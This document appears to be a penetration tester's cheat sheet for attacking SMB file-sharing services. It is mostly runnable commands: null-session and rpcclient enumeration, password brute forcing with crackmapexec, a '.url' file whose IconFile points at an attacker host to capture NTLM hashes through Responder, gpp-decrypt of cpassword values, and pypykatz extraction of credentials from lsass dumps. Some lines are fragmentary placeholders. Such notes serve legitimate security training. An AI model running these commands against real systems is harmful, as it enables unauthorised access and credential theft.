Server Message Block

Footprinting The Service

Nmap

sudo nmap 10.129.14.128 -sV -sC -p139,445

RPCclient

rpcclient -U "" 10.129.14.128

rpcclient -U'%' 10.10.110.17

-U'%': Explicitly sends an empty username and no password. -N: Does not send any username or password, attempting to establish a null session.

Query	Description
srvinfo	Server information.
enumdomains	Enumerate all domains that are deployed in the network.
querydominfo	Provides domain, server, and user information of deployed domains.
netshareenumall	Enumerates all available shares.
netsharegetinfo <share>	Provides information about a specific share.
enumdomusers	Enumerates all domain users.
queryuser <RID>	Provides information about a specific user.

Search For Known SMB Version Vulnerabilities

Check For Shares Using Null Sessions

smbclient -N -L //$ip/

cme smb $ip --shares -u "guest" -p ""

Brute Forcing

cme smb $ip -u users.list -p pws.list --local-auth | grep '[+]'

If the target

URL File attacks

Test for URL File attacks by creating a file called "@somename.url" with the following contents, upload, spin up smbserver to capture hash

[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\EnterAttackerip\%USERNAME%.icon
IconIndex=1

Run Responder to capture hashes

/opt/Responder-3.1.3.0/Responder.py -I tun0

Read / Upload access

Attempt to download and view share contents using valid credential / anonymous login / null session

smbmap -H $ip

smbmap -H $ip -r 

Using smbmap with the -r or -R (recursive) option, one can browse the directories

smbmap -H 10.129.14.128 --download "notes\note.txt"

Downloading

smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"

Uploading

smbmap -u guest -p "" -H $ip -A '.*' -R

Cpassword discovery

Search "Groups.xml" for cpassword decryption

gpp-decrypt cpassword

lsass.zip lsass.dmp

search lsass.zip or lsass.dmp to use to dump credentials / keys / tickets

pypykatz lsa minidump "lsass.zip"

Alternate Data Streams (ADS)

test for alternate data streams after discovering 0 byte files

allinfo filename

Check Password Policy

cme smb $ip --pass-pol -u guest -p ""

User Discovery

Check For users using valid credential / anonymous login / null session

cme smb $ip --users -u guest -p ""

cme smb $ip --rid-brute -u guest -p ""

Group discovery

check for groups using valid credential / anonymous login / null session

cme smb $ip --groups -u guest -p ""

Smbclient

Interactively access the smb shares using smbclient

smbclient //$ip/someshare -N

smbclient //$ip/someshare -U 'guest' -N

smbclient //$ip/someshare -U 'validuser' -p 'validpass'

Smbmap

// Some code

Dangerous Settings

Setting	Description
browseable = yes	Allow listing available shares in the current share?
read only = no	Forbid the creation and modification of files?
writable = yes	Allow users to create and modify files?
guest ok = yes	Allow connecting to the service without using a password?
enable privileges = yes	Honor privileges assigned to specific SID?
create mask = 0777	What permissions must be assigned to the newly created files?
directory mask = 0777	What permissions must be assigned to the newly created directories?
logon script = script.sh	What script needs to be executed on the user's login?
magic script = script.sh	Which script should be executed when the script gets closed?
magic output = script.out	Where the output of the magic script needs to be stored?